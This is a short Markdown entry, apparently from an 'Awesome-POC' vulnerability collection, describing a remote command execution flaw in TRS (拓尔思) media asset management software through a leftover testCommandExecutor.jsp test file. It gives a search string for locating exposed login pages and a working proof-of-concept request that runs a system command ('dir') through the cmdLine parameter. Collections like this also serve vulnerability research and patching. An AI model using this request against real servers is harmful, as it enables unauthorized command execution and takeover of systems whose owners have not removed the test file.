Awesome-POC/Web应用漏洞/拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
692 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞
## 漏洞描述
拓尔思 TRS testCommandExecutor.jsp测试文件存在远程命令执行漏洞当网站运维者未删除测试文件时攻击者通过漏洞可以获取服务器权限
## 漏洞影响
```
拓尔思-TRS
```
## 网络测绘
```
"TRS媒资管理系统登录页面"
```
## 漏洞复现
主页面
![image-20230314084307993](images/image-20230314084307993.png)
验证POC
```
/mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv=
```
![image-20230314084331676](images/image-20230314084331676.png)